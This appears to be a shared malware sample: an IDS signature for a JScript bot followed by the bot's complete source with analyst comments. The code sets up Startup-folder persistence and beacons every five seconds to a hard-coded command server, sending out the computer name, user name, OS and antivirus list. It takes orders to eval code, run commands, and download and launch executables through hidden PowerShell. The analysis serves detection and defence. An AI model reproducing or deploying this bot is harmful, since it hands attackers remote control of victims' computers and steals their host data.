James_inthe_box

Jscript Bot

Jan 6th, 2019
# Beacon signature for the JScript bot listed below. Each match field is grounded in the sample:
#   - POST ... !$HTTP_PORTS : the bot posts to a literal http://micro-soft-updates.ga:8880/connect,
#                             i.e. plain HTTP on a non-standard port, hence the !$HTTP_PORTS scope.
#   - 'User-Agent: xmsSofts_1.0.0_' : VN = 'xmsSofts_1.0.0' + '_' + <volume serial> is the first
#                             field of the fingerprint the bot sends as its User-Agent.
#   - 'Content-Length: 0'   : the main loop calls SendHttp() with no body argument.
# Caveats for the rule author:
#   - The script registers the header under the name 'User-Agent:' (trailing colon). Verify the
#     exact on-wire header bytes from a capture before trusting the |3a 20| spacing in this content.
#   - to_server only. The C2 reply is '<order>|V|<arg1>|V|<arg2>' ('|V|' delimiter), which could
#     support a response-side rule; none is provided here.
alert tcp $HOME_NET any -> $EXTERNAL_NET !$HTTP_PORTS (msg:"JScript Bot Initial Checkin"; flow:established,to_server; content:"POST"; http_method; content:"User-Agent|3a| xmsSofts_1.0.0_"; content:"Content-Length|3a 20|0"; http_header; classtype:trojan-activity; sid:20166280; rev:1; metadata:created_at 2019_01_06;)
  2.  
// ---------------------------------------------------------------------------
// Analyst notes (defensive review of a public sample; code left untouched,
// only comments added).
//
// This listing looks like a deobfuscated/instrumented dump: util_log() and
// _inspect(), called from every catch block, are not defined anywhere in it
// and read like analysis-harness instrumentation standing in for originally
// empty catch blocks — TODO confirm against the raw sample.
//
// Behaviour visible in the code:
//   * persistence : copies itself into the per-user Startup folder (ModinySks)
//                   before the first beacon.
//   * beacon      : every 5 s, a blocking HTTP POST with an empty body to
//                   http://micro-soft-updates.ga:8880/connect; the host
//                   fingerprint travels in the User-Agent header.
//   * tasking     : the response is '<order>|V|<arg1>|V|<arg2>'. Orders:
//                   Ex (eval JScript), Cmd (run command line), DwnlExe
//                   (download + launch), SelfRemove, UpdateS (download,
//                   delete self, launch replacement).
//   * child procs : every action is carried out by spawning powershell.exe
//                   with a hidden window from the WSH host process.
// ---------------------------------------------------------------------------
var shell = new ActiveXObject('WScript.Shell');              // Run(), ExpandEnvironmentStrings()
var fstym = new ActiveXObject('Scripting.FileSystemObject'); // fileexists()
var spl = '|V|'; // delimiter between fields of the C2 response
var Ch = '\\';   // delimiter between fields of the outbound fingerprint string
// Victim ID: fixed campaign tag + volume serial of the first logical disk.
// This 'xmsSofts_1.0.0_' prefix is what the IDS rule above keys on.
var VN = 'xmsSofts_1.0.0' + '_' + getSerial();
// Per-user Startup folder: persistence location written by ModinySks and
// cleaned up by SelfRemove / UpdateS.
var Startup = getEnv('appdata') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
// All-users Startup folder: computed but never referenced again in this listing.
var StartupAll = getEnv('allusersprofile') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
var Temp = getEnv('temp') + '\\';      // drop directory for downloaded payloads
var fxDmE4zu = WScript.ScriptFullName; // own full path (deleted on SelfRemove / UpdateS)
var wn = WScript.ScriptName;           // own file name (also the name of the Startup copy)
var UDex;       // never assigned anywhere: its fingerprint slot always reads 'undefined'
var DeLay = 20; // seconds to wait between a download completing and launching it
ModinySks();    // install persistence first, then start beaconing
do {
  try {
    var send = SendHttp();         // blocking beacon; returns the C2 response body
    var Command = send.split(spl); // '<order>|V|<arg1>|V|<arg2>'
    var order = Command[0];
    var order_data = Command[1];
    if (order === 'Ex') {
      // Arbitrary JScript supplied by the C2 runs inside this process.
      eval(order_data);
    }
    if (order === 'Cmd') {
      // Arbitrary command line: window style 0 (hidden), no wait.
      shell.Run(order_data, 0, false);
    }
    if (order === 'DwnlExe') {
      // Download arg1 (URL) to %TEMP%\<arg2> with a PowerShell WebClient
      // (redirects followed), sleep DeLay seconds, then launch it.
      // The download Run() does not wait, so the sleep is the only
      // synchronisation; the launch path is unquoted here (UpdateS quotes it).
      var path = Temp + Command[2];
      shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, false);
      WScript.Sleep(DeLay * 1000);
      shell.Run('powershell.exe start ' + path, 0, false); // 'start' = Start-Process
    }
    if (order === 'SelfRemove') {
      // Delete the Startup copy and the running script ('del' = Remove-Item), then exit.
      shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
      shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
      WScript.Quit(1);
    }
    if (order === 'UpdateS') {
      // Same download as DwnlExe, but this Run() waits for PowerShell to
      // return (true). Only if the file actually landed: remove both copies
      // of this script, wait DeLay seconds, launch the replacement, exit.
      var path = Temp + Command[2];
      shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, true);
      if (fstym.fileexists(path)) {
        shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
        shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
        WScript.Sleep(DeLay * 1000);
        shell.Run("powershell.exe start '" + path + "'", 0, false);
        WScript.Quit(1);
      }
    }
  } catch (err) {
    // util_log / _inspect are not defined in this listing (see header note).
    // Taken literally, any error reaching this handler would itself throw
    // and end the loop; in the original this was presumably a silent catch.
    util_log('>>> Silencing catch ' + _inspect(err));
  }
  WScript.Sleep(5000); // beacon interval: 5 s
} while (true);
// Beacon / tasking channel: one blocking HTTP POST to the hard-coded C2.
//
// R       request body. The main loop calls SendHttp() with no argument, so
//         the body is empty — this is the 'Content-Length: 0' the IDS rule
//         above checks for.
// returns the response text; the caller splits it on '|V|'.
//
// Detection / forensics notes:
//   * C2 URL is a literal: http://micro-soft-updates.ga:8880/connect
//     (plain HTTP, non-standard port 8880 — hence the rule's !$HTTP_PORTS).
//   * The fingerprint from getUserAgent() is sent as the User-Agent, but the
//     header NAME is passed as 'User-Agent:' with a trailing colon. What MSXML
//     actually emits on the wire should be confirmed from a capture before
//     relying on the exact 'User-Agent: xmsSofts' byte sequence.
//   * open(..., false) makes the request synchronous and no timeout is set,
//     so an unreachable C2 stalls the main loop for the duration of the request.
function SendHttp(R) {
  var X = new ActiveXObject('Microsoft.XMLHTTP');
  X.open('POST', 'http://micro-soft-updates.ga:8880/connect', false);
  var useragent = getUserAgent();
  X.SetRequestHeader('User-Agent:', useragent);
  X.send(R);
  return X.responsetext;
}
// Builds the host fingerprint that is exfiltrated in the User-Agent header.
//
// Fields, joined by Ch ('\\'), in order:
//   VN | COMPUTERNAME | USERNAME | <OS caption>[<CPU address width>] |
//   <AV product names> | NT | UDex | <trailing separator>
//
// NT is 'YES' when %Windir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe exists,
// i.e. a .NET Framework 2.0 presence check (presumably so the operator knows
// whether a .NET payload can run; nothing in this listing reads NT again).
// UDex is never assigned, so that slot always carries the text 'undefined'.
// jsUcfirst() capitalises each field and strips one backslash from it,
// presumably to keep values from colliding with the field separator.
function getUserAgent() {
  var s, NT, i;
  if (fstym.fileexists(getEnv('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) {
    NT = 'YES';
  } else {
    NT = 'NO';
  }
  s = VN + Ch + jsUcfirst(getEnv('COMPUTERNAME')) + Ch + jsUcfirst(getEnv('USERNAME')) + Ch + jsUcfirst(getSystem() + '[' + getOSVer() + ']') + Ch + jsUcfirst(getAntiV()) + Ch + NT + Ch + UDex + Ch;
  return s;
}
// Reads environment variable S by expanding '%S%' through WScript.Shell.
// Returns the expanded string. NOTE(review): an unset variable is expected to
// come back unexpanded as the literal '%S%' (ExpandEnvironmentStrings
// semantics); none of the callers guard against that, so e.g. a missing
// %appdata% would yield a Startup path that starts with '%appdata%\'.
function getEnv(S) {
  return shell.ExpandEnvironmentStrings('%' + S + '%');
}
// Victim-ID source: VolumeSerialNumber of the FIRST Win32_LogicalDisk instance
// WMI enumerates (the loop returns on its first iteration; the 'break' is
// unreachable). Returns undefined if the enumeration is empty; if the first
// enumerated drive has no mounted volume the property may be null — TODO
// confirm on a host whose first drive letter is an empty removable drive.
// Forensics: this value is the suffix of VN, visible in every beacon's
// User-Agent, so it can be correlated with the disk of the infected host.
function getSerial() {
  var s;
  s = GetObject('winmgmts:').InstancesOf('win32_logicaldisk');
  var en = new Enumerator(s);
  for (; !en.atEnd(); en.moveNext()) {
    var it = en.item();
    return it.volumeserialnumber;
    break;
  }
}
// OS name: Win32_OperatingSystem.Caption of the first enumerated instance.
// Returns undefined if WMI returns nothing (the caller concatenates it into a
// string, so the fingerprint would then read 'undefined[...]'). The 'break'
// after 'return' is unreachable.
function getSystem() {
  var s = GetObject('winmgmts:').InstancesOf('Win32_OperatingSystem');
  var en = new Enumerator(s);
  for (; !en.atEnd(); en.moveNext()) {
    var it = en.item();
    return it.Caption;
    break;
  }
}
// Misnamed: returns Win32_Processor 'cpu0'.AddressWidth — the CPU address
// width (32/64), not an OS version. Rendered inside '[...]' after the OS
// caption in the fingerprint. Throws if WMI has no 'cpu0' instance; that
// propagates up through getUserAgent()/SendHttp() to the main loop's catch.
function getOSVer() {
  return GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth;
}
// Enumerates installed AV products through the WMI SecurityCenter namespaces
// and returns their DisplayName values joined with ' , ' ('' if none found).
//
// Queries root\securitycenter first and then root\securitycenter2. Because
// 'str' is function-scoped (var), the guard 'str !== ""' is true both when
// the first query found products (str = last DisplayName) and when it found
// nothing or threw (str = undefined); the second query is only skipped when
// the last DisplayName from the first namespace was the empty string. So in
// practice both namespaces are queried.
//
// Each query is wrapped in try/catch. NOTE(review): I'd expect one of the two
// namespaces to be absent depending on Windows version, which is presumably
// why failures are swallowed — confirm. util_log / _inspect are not defined
// in this listing (see the header note at the top of the script).
function getAntiV() {
  var s;
  var finalx = [];
  var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter';
  try {
    s = GetObject(wmg).InstancesOf('AntiVirusProduct');
    var en = new Enumerator(s);
    for (; !en.atEnd(); en.moveNext()) {
      var it = en.item();
      var str = it.DisplayName;
      finalx.push(str);
    }
  } catch (e) {
    util_log('>>> Silencing catch ' + _inspect(e));
  }
  if (str !== '') {
    // 'securitycenter' + '2' -> root\securitycenter2
    wmg = wmg + '2';
    try {
      s = GetObject(wmg).InstancesOf('AntiVirusProduct');
      en = new Enumerator(s);
      for (; !en.atEnd(); en.moveNext()) {
        it = en.item();
        var str = it.DisplayName;
        finalx.push(str);
      }
    } catch (e) {
      util_log('>>> Silencing catch ' + _inspect(e));
    }
  } else {
  }
  var finalxsrt = finalx.join(' , ');
  return finalxsrt;
}
// Persistence: copies the running script into the per-user Startup folder
// under its own file name, via a hidden PowerShell Copy-Item (Run window
// style 0, no wait). Called once at start-up, before the first beacon.
//
// Detection: the WSH host process spawning powershell.exe with
// 'Copy-Item -Path <script> -Destination ...\Start Menu\Programs\Startup\'.
// The try/catch only covers Run() itself failing; because the call does not
// wait, a copy that fails inside PowerShell is never reported back.
// util_log / _inspect are not defined in this listing (see header note).
function ModinySks() {
  try {
    shell.Run("powershell.exe Copy-Item -Path '" + fxDmE4zu + "' -Destination '" + Startup + wn + "'", 0, false);
  } catch (err) {
    util_log('>>> Silencing catch ' + _inspect(err));
  }
}
// Upper-cases the first character of `string` and removes the FIRST backslash
// only (String.replace with a string pattern replaces one occurrence).
// Applied to every fingerprint field in getUserAgent(), presumably so values
// are less likely to collide with the '\\' field separator; a value holding
// two or more backslashes would still corrupt the field split on the C2 side.
// Throws if `string` is null/undefined (all callers pass strings or string
// concatenations).
function jsUcfirst(string) {
  var strx = string.charAt(0).toUpperCase() + string.slice(1);
  strx = strx.replace('\\', '');
  return strx;
}